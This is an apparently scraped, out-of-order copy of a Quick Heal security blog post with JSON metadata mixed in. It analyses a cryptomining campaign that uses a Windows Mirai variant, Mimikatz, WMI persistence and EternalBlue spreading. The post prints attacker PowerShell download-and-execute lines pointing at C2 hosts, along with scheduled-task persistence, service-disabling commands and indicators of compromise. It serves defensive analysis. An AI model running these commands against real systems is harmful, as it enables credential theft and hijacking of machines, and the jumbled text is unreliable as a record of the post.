\n<\/b><\/strong>Infection vector:<\/b><\/strong><\/p>\n
We received a miner downloader which downloads multiple components of the attack. This script may come to your system through spam mails, malicious URLs, free software bundler or any conventional method that is being used by all the malware variants. Also, we suspect\u00a0that\u00a0a powershell script\u00a0seems to be\u00a0the initial culprit.\u00a0The behavior of the miner is a bit recursive in nature so we could not confirm its initial trace in the system.<\/p>\n
The miner downloader creates a file named as \u2018xpdown.dat\u2019 which contains some IP addresses of C2 servers from where it downloads further components.<\/p>\n 45.58.135.106 It then downloads the following files from the domains:<\/p>\n hxxp:\/\/45.58.135.106\/xpdown.dat It contains the IP which downloads the CPU Miner (174.128.248.10)<\/p>\n hxxp:\/\/45.58.135.106\/kill.txt<\/em><\/p>\n It contains the following list of process to kill if it was running on victim machine.<\/p>\n lsmose.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 lsmos.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0conime.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 lsmosee.exe hxxp:\/\/45.58.135.106\/down.txt<\/em><\/p>\n And this down.txt contains the following links. The malware then opens a TCP port 32381 on the system.<\/p>\n hxxp:\/\/213.183.45.201\/downs.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 (C:\\windows\\system\\downs.exe) Looking at the links in the file we observed following things.<\/p>\n Downs.exe is a modified version of Microsoft \u201cCACLS\u201d (Which displays and modifies the access control list). Ups.rar is downloaded as cab.exe. This component is a downloader for windows variant of Mirai botnet. This also acts as a DNS Changer and opens a backdoor in the system. On execution, it performs multiple operations like modifying the DNS entry in the host with IP \u201c223.5.5.5\u201d which has the Geo location in China and ISP of DNS is \u201cHangzhou Alibaba Advertising Co.,Ltd.\u201d<\/p>\n <\/p>\n <\/p>\n Then it checks whether the compromised machine is a window server or not by calling GetVersionExA. It downloads update.txt from C2 server, if the machine is server, and drops at \u201cC:\\windows\\system\\uplist.txt\u201d. The uplist.txt contains the following payload to be downloaded and executed.<\/p>\n hxxp:\/\/66.117.6.174\/wpd.jpg\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(C:\\windows\\system\\msinfo.exe) It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These are files used for network packets processing loaded by msinfo.exe during its execution.<\/p>\n Let\u2019s look into these components one by one.<\/p>\n my1.bat:<\/b><\/strong><\/p>\n It contains the code which is very stealthy and evasive as it uses several techniques such as \u201cSquiblydoo\u201d, \u201cdownload cradle\u201d and WMI Event Subscription persistence exploit to run malicious content on infected machines.<\/p>\n The WMI script contains multiple PowerShell scripts.<\/p>\n powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp:\/\/173.208.139.170\/s.txt’) <\/i><\/em><\/p>\n This text file contains another PowerShell downloader as follows:<\/p>\n powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp:\/\/74.222.1.38\/up.txt’)<\/i><\/em><\/p>\n \u201cUp.txt\u201d contains the code which collects information regarding System OS, Physical Memory, List of running processes using WMI classes and then downloads Powershell format of Mimikatz from Github.<\/p>\n Further it steals the credentials from the compromised machine and uploads it to the FTP server IP:192.187.111.66 with hard coded credential of FTP.<\/p>\n Msinfo.exe:<\/b><\/strong><\/p>\n \u00a0<\/b><\/strong>It is basically a windows version of Mirai botnet. As more of its code matches with Mirai source code which was leaked previously. Upon execution with command line parameters \u201c-create\u201d \u201c-run\u201d, it checks the architecture of the current system whether it is x86, MIPS, ARM etc. Based on the identification, it will check for its latest update and download if available.<\/p>\n It performs the following task as per an encrypted file downloaded from C2 server.<\/p>\n By these steps it converts this system into a bot and adds to their bot network.\u00a0Its code has been developed in C++ and distributed across many sources like-<\/p>\n CheckUpdate.cpp It basically targets IoT devices which contain embedded Linux. So it has used BusyBox (a software suite that provides UNIX utilities also called as Swiss Army Knife of embedded Linux) for executing remote commands after compromising\/cracking those devices through various ways mentioned above.<\/p>\n First the payload will be dropped and executed on the below location in the victim machine.<\/p>\n hxxp:\/\/213.183.60.7\/b.exe \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0( downloaded at C:\\windows\\inf\\msief.exe)<\/em><\/p>\n On execution, it will drop the VBS and batch file in the below mentioned location and execute the vbs file by invoking wscript.exe which eventually execute the bat file.<\/p>\n C:\\Windows\\web\\c3.bat The bat file contains a lot of code, which will modify attributes of some folder\/files, kill some specific processes, delete some files, modifies the access control of some folder\/files, make persistent for multiple payload in the system via registry, task scheduler, WMI Event subscription and also modifies the firewall policy by blocking 445,139 ports.<\/p>\n <\/p>\n There are also two more additional payloads which are downloaded from one of C2 server present in xpdown.dat; one is a diskwritter, a DLL file , dropped at \u201cC:\\Windows\\debug\u201d location. It will execute on system start as it has an entry in task scheduler added by the above bat file.<\/p>\n schtasks \/create \/tn “Mysa1” \/tr “rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa” \/ru “system” \u00a0\/sc onstart \/F <\/em><\/p>\n And the second one is the final payload i.e. XMRig Monero Miner, a 64 bit executable downloaded from hxxp:\/\/174.128.248.10\/64.rar at “C:\\windows\\debug\\lsmos.exe”<\/p>\n On execution, it unpacks itself and drops 3 files on the current execution folder, one is an executable (lsmose.exe -64 bit packed with VM Protect) file and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll), which helps miner for successful execution.<\/p>\n One more similar case we have observed, a base64 encoded PowerShell script which is basically a cryptomining malware hiding in WMI class to evade AV and most of the security product due to its stealthy and unique feature.<\/p>\n After decoding we get the following code:<\/p>\n <\/p>\n Following is basic workflow of the malware.<\/p>\n On execution, it checks whether IP\/Domain is alive or not mentioned in the code. If it is available, it requests for banner and receive a response as \u2018SCM Event1 Log<\/i><\/em>\u2019<\/p>\n After that malware queries for \u2018FilterToConsumerBinding\u2019 WMI Class by executing the below command<\/p>\n $a=([string](Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding))<\/i><\/em><\/p>\n and then checks whether it contains \u2018SCM Event1 Log<\/i><\/b><\/em><\/strong>\u2019.<\/b><\/strong>\u00a0If not present, then it downloads and executes in6.ps1 <\/i><\/em>(64 bit) or in3.ps1 <\/i><\/em>(32 bit) by Invoking Expression(IEX).<\/p>\n <\/p>\n in6.ps1\/in3.ps1:<\/b><\/u><\/strong><\/p>\n These scripts consist of two parts, first part is a base64 encoded Gzip data stream and second part contains obfuscated code. After de-obfuscation, the code reassembles similar to initial base64 encoded script with additional features.<\/p>\n The encoded gzip contains four files as mentioned below:<\/p>\n It creates a WMI Class \u201csystemcore_Updater0\u201d under the Namespace \u201croot\\default\u201d and adds properties like mimi, mon, funs, sc, ipsu and i17.<\/p>\n Then it sets the filtername=\u201dSCM Event1 Log Filter\u201d and consumername=\u201dSCM Event1 Log Consumer\u201d<\/p>\n When attacker uses WMI as a persistence mechanism, instances of __EventFilter,_EventConsumer and __FilterToConsumerBinding have to be created and an _InstanceCreationEvent event is fired.<\/p>\n In this case, attacker uses\u00a0following query as the EventFilter and binds it with the initial base64 encoded script, which will eventually get executed approximately in every 3 hrs.<\/p>\n SELECT * FROM __InsanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System<\/i><\/em><\/p>\n It has tried to delete the task scheduler entry \u201csysupdater0<\/b><\/strong>\u201d also checks \u201csysupdater0.bat\u201d in %systemroot% , if exists remove that as well.<\/p>\n Modifies Windows sleep, hibernate and power plan setting by invoking the following command: It removes all WMI Object in __FilterToConsumerBinding class under Namespace \u201croot\\subscription\u201d if filter name has not matched with \u201cSCM Event0 Log\u201d<\/p>\n Then it kills the process if it has an \u201cESTABLISHED\u201d connection with port number 3333, 5555 or 7777.<\/p>\n It makes a list of PIDs of running \u201cPowershell\u201d processes and the network connections of the system. It then checks for the process with \u201cESTABLISHED\u201d connection and associated port number 80 or 14444 or 14433 or 443. If no such processes exist and the count of running PowerShell processes are less than 8 then it executes the Monero Miner using \u201cfuns\u201d module. After that it executes the mimikatz and dumps the credential irrespective of execution of Monero Miner.<\/p>\n It also enumerates the network addresses and checks for the IPs that are active and adds them to the property named, \u2018ipsu\u2019. It then scans those IPs to identify the systems which are vulnerable to MS17-010 (with Eternal Blue Scanner Script), stores them to the property \u2018i17\u2019 and finally executes shell code which will download the ze3.ps1<\/i><\/em>\u00a0or\u00a0ze6.ps1<\/i><\/em>\u00a0exactly similar to in3.ps1 or in6.ps1 based on OS architecture.<\/p>\n Shell code downloads and executes the PS Script to infect other vulnerable systems.\u00a0This way it spreads and mines the other systems on the networks.<\/p>\n So in both the cases, the open source tools are abused heavily to perform the attack. Mimikatz, masscan, eternal blue vulnerability scanner seems to be popular tools among the malware authors. Similar techniques are being used for spreading the ransomware too. Quick Heal successfully detects such attacks at various detection levels.<\/p>\n 790C213E1227ADEFD2D564217DE86AC9FE660946E1240B5415C55770A951ABFD <\/p>\n Subject Matter Expert:<\/b><\/strong><\/p>\n Priyanka Shinde, Goutam Tripathy, Vallabh Chole From the last one year, Quick Heal Security Labs has been observing a boost in the number of mining malware. One of the ways to earn cryptocurrencies is to mine them. Nowadays cryptocurrency miner malware have become hot attack vectors for cybercriminals due to its ease of deployment and instant return on investments. We usually […]<\/p>\n","protected":false},"author":47,"featured_media":87177,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1613,171,24,5],"tags":[1655,1632,1534,1656,1659,114,1658,1657],"class_list":["post-87640","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cryptojacking","category-enterprise","category-malware","category-security","tag-masscan","tag-mimikatz","tag-miner","tag-mirai","tag-monero-miner","tag-open-source","tag-powershell-malware","tag-wmi-malware"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87640"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/47"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=87640"}],"version-history":[{"count":25,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87640\/revisions"}],"predecessor-version":[{"id":87681,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87640\/revisions\/87681"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/87177"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=87640"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=87640"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=87640"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nTechnical Analysis:<\/b><\/strong><\/p>\n![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Blogs1.gif\")
\n<\/em>103.95.28.54
\n<\/em>103.213.246.23
\n<\/em>74.222.14.61
\n<\/em>Ok.xmr6b.ru<\/em><\/p>\n
\n<\/em>hxxp:\/\/45.58.135.106\/down.html
\n<\/em>hxxp:\/\/45.58.135.106\/ok\/64.html<\/em><\/p>\n
\n<\/em>1.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 lsazs.exe \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 tasksche.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Zationa.exe
\n<\/em>csrs.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0shennong.bat\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 svshpst.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Spoolvs.exe
\n<\/em>svchsot.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0xmrig.exe \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<\/strong>srvany.exe \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0WinSCV.exe
\n<\/em>csrswz.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 csrs.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 seser.exe \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0severxxs.exe
\n<\/em>mssecsvc.exe \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 mssecsvr.exe \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0dsbws.exe<\/em><\/p>\n
\n<\/b><\/strong>Then malware downloads a text file which contains the information of multiple payloads to be downloaded.<\/p>\n
\n<\/em>hxxp:\/\/66.117.6.174\/ups.rar\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(C:\\windows\\system\\cab.exe)
\n<\/em>hxxp:\/\/213.183.60.7\/b.exe\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 (C:\\windows\\inf\\msief.exe)
\n<\/em>hxxp:\/\/174.128.239.250\/item.dll\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(C:\\windows\\debug\\item.dat)<\/em><\/p>\n![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture1.png\")
\n<\/em>hxxp:\/\/66.117.6.174\/my1.html\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(C:\\windows\\system\\my1.bat)<\/em><\/p>\n![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture2.png\")
\n
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 [Cracker:Telnet][Cracker:MSSQL] [Cracker:CCTV][Cracker:MS17010], CrackerWMI, CrackerSSH<\/em><\/li>\n<\/ol>\n\n
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 https:\/\/github.com\/robertdavidgraham\/masscan<\/em><\/li>\n<\/ol>\n\n
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 C:\\Windows\\system32\\cmd.exe \/c taskkill \/f \/im csrs.exe&sc stop netprofm&sc config netprofm
\n<\/em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 start= disabled&<\/em>sc stop NlaSvc&sc config\u00a0 \u00a0 \u00a0NlaSvc start=disabled<\/em><\/li>\n<\/ol>\n\n
\n<\/em>Cracker_Inline.cpp
\n<\/em>Cracker_Standalone.cpp
\n<\/em>CThreadPool.cpp
\n<\/em>Logger_Stdout.cpp
\n<\/em>Scanner_Tcp_Connect.cpp
\n<\/em>Scanner_Tcp_Raw.cpp
\n<\/em>cService.cpp
\n<\/em>ServerAgent.cpp
\n<\/em>Task_Crack_Ipc.cpp
\n<\/em>Task_Crack_Mssql.cpp
\n<\/em>Task_Crack_Rdp.cpp
\n<\/em>Task_Crack_Ssh.cpp
\n<\/em>Task_Crack_Telnet.cpp
\n<\/em>Task_Crack_Wmi.cpp
\n<\/em>Task_Scan.cpp WPD.cpp<\/em><\/p>\n
\nVBS\/BAT Agent For Download Miner:<\/b><\/strong><\/p>\n
\n<\/em>C:\\Windows\\web\\n.vbs<\/em><\/p>\n![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture3.png\")
<\/p>\n![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture4.png\")
![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture5.png\")
![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Blogs2.gif\")
![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture6.png\")
![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture7.png\")
![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture8.png\")
\n
![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture9.png\")
![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture10.png\")
\npowercfg \/CHANGE -standby-timeout-ac 0
\n<\/i><\/em>powercfg \/CHANGE -hibernate-timeout-ac 0
\n<\/i><\/em>powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 <\/i><\/em><\/p>\n![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/04\/Picture11.png\")
\nIndicator of Compromise:<\/b><\/strong><\/p>\n
\n46BC86CFF88521671E70EDBBADBC17590305C8F91169F777635E8F529AC21044
\nAE161E582DE9EC380B3E0B295EFFD62EB8889AC35BC6631A9492CF41563ED14A
\n0E91F531A05C70B6CF3A8FA942B91A026A5B57069AA5B5C8DFE1EBCBC63AEAE9
\nEAEF82223EEB8CF404A1D46613D36B9E582304B215201B5E557DB578DD73E04E
\n30CDBB5C9E23758E8C74E9FDBAEE893D67D3BA42B3B09196CF98395738A67F56
\n7EC433DD0454553B09F11C39944E251E3EE32E4981F52F02ADC3011EB0CE6537
\nEA7CEDE3BCB8AD6A8E9FED3CB34F8E6746D445E2044455261EAD4E5092070408
\n88D338D9FC1990E3D48CDB7E704E785953271EEAB97F196BBCD0C4D2D76F7DC3
\n789CBE603582262914191882DEC7E6A6F1D61D062D2BDF21B8892BC5854C6196
\n9868C6F0F23FB81229E2EF765FF524602244384C420D14FFD5708341D85EF4CE
\nD256AF525680DF6A6178AD608D1700FE5178AA2F3EFE4A52DBCF7AD7EA524936<\/p>\n
\nSecurity Labs, Quick Heal Technologies, Ltd.<\/p>\n","protected":false},"excerpt":{"rendered":"